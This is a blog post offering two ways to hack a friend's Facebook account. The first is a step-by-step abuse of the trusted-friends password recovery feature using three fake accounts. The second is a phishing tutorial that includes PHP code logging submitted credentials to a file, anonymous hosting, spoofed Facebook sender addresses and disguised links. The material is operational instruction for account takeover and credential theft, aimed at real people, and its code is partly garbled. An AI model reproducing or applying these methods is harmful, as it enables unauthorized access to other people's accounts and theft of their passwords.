How to Hack Your Friend’s Facebook Account Easily
May 8, 2012 By 272 Comments
Millions of people are talking about Facebook Account Hacking Tricks.
But after a long search a few are able to do so who have much knowledge
of HTML coding and professional in IT. But Hackers are trying to get
the best and easy trick to Hack the Facebook Accounts. Everybody know that it’s not so much easy to hack facebook accounts.
Facebook pays a lot of money to it’s security employees and experts to
reduce hacking of accounts. But hackers have gained a super rage in IT
market and they have unleashed a trick to hack facebook account. This trick is not funny or fake at all.
Many of you know that Facebook has integrated a new feature to recover forgotten passwords of users i.e. Three Trusted Facebook Account Friends. However, this trick is integrated for recovering the lost passwords by Facebook but Hackers reversed it and use this trick to hack the Facebook Accounts. This is a major black hole in Facebook and it’s security plannings.
Recommended: Facebook Distracting You From Work? Block It!
Many people hacks Facebook Accounts by Keylogging, Phishing sites, DDOS attacks etc but that is neither called hacking nor the people called hackers. These are the alternate methods of hacking.
By the way the trick unleashed which we
are talking about here is also not so much simple at all. But it is easy
to do as about every people and children can do so. You have to make THREE FAKE FACEBOOK ACCOUNTS to do this trick. And the most important is that these all 3 FAKE ACCOUNTS were added in your friend’s list whose account you are about to Hack.
Recommended: Facebook Tracks You Even After Logging Out
After this, you are able to hack your Friend’s Facebook Account easily by just following the steps given below.
Step To Step Guide How to hack facebook account Easily:
- As we have already discussed before to create THREE FAKE FACEBOOK ACCOUNTS and add them in the friend list of your friend’s Facebook account whom account you are about to hack. If you have done so, then you have finished about 90% of your work to Hack the account.
- The, click on Forgot Facebook Password button. Facebook system will show you three solutions to recover your password as shown below
- Fill the Email address of your friend in the first section and give your Friend’s Name and your name in the Name Field
- Then, click on Search Button.
- If you have done above steps correctly, then you will see the profile picture of your friend whose Email address is to be filled/whose account is to be hacked
- After that, click on No Longer Have Access to These
- Then, enter a New Email Address which has not to be used with Facebook Account earlier and click on the Submit button to proceed to next step
- You will be asked for the security question’s answer. If you know the answer then it’s perfect and if you don’t know then fill it with wrong answers 3 times
- After this submission/giving wrong answers, Facebook Security will show you TRUSTED FRIENDS feature to recover the account
- Click on the Continue button
- Then, it will ask you to fill/select 3 Friends ( select your 3 Fake Account’s Name) from the shown list and click the Continue button each time after the selection
- After the above step, Facebook have sent the security codes to each of the 3 accounts selected
- Then, Login to each of the 3 accounts and note the security codes manually and fill them in proper manner ( If they are not found in Inbox then check the Spam Folder too )
- Now, the Password Reset Email has been sent to the new Email provided by you in the 7th step
That’s it! You are done successfully, Now, you have access to your Friend’s Facebook Account which has been HACKED.
How to Hack Facebook Account
Everyone
eager to hack the facebook account of others. Here is the simplest
method using phishing webpage ,you can hack the facebook account of your
friends .
Publishing WebPage:
Creating webpage which look like any site is described as Phishing.
By creating Phishing WebPage, you can make users to believe that it is
original website and enter their id and password.
Step 1:
Go to Facebook.com
Right click on the white space of the front page. Select “View Page source”.
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for “action=” in that code.
You fill find the code like this:
The big red ring that circles the action= you have to change. You
have to change it to ‘action=”next.php” ‘. after you have done that, you
should change the method (small red circle on the picture) to “get”
instead of “post”, or else it will not work. Save the document as
index.html
Step 3:
Now we need to create the “next.php” to store the password. so open the notepad and type the following code:
<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pswrds.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
save this file as “next.php”
Step 4:
open the notepad and just save the file as “pswrds.txt” without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can
hide your ip address) like: http://flyproxy.com . find best secure
connection site.
Step 5:
create an mail account with facebook keyword like
:
FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com
Step 6 :
Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
*Updated*
everyone asking doubts about this 6th step. You may get Facebook
friendship invitation from Facebook when someone “add as a friend”,
right? Just copy that mail and paste in compose mail. In that content ,
you can find this link http:/www.facebook.com/n/?reqs.php . Just change the delete the link and create link with same text but link to your site.
Add hyperlink button in the red circle. now write your phisher page
url in the hyperlink bar that appears after clicking the button. and
click add. The hyperlink should still display
http:/www.facebook.com/n/?reqs.php
but lead to your phisher page..
but lead to your phisher page..
Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
No comments:
Post a Comment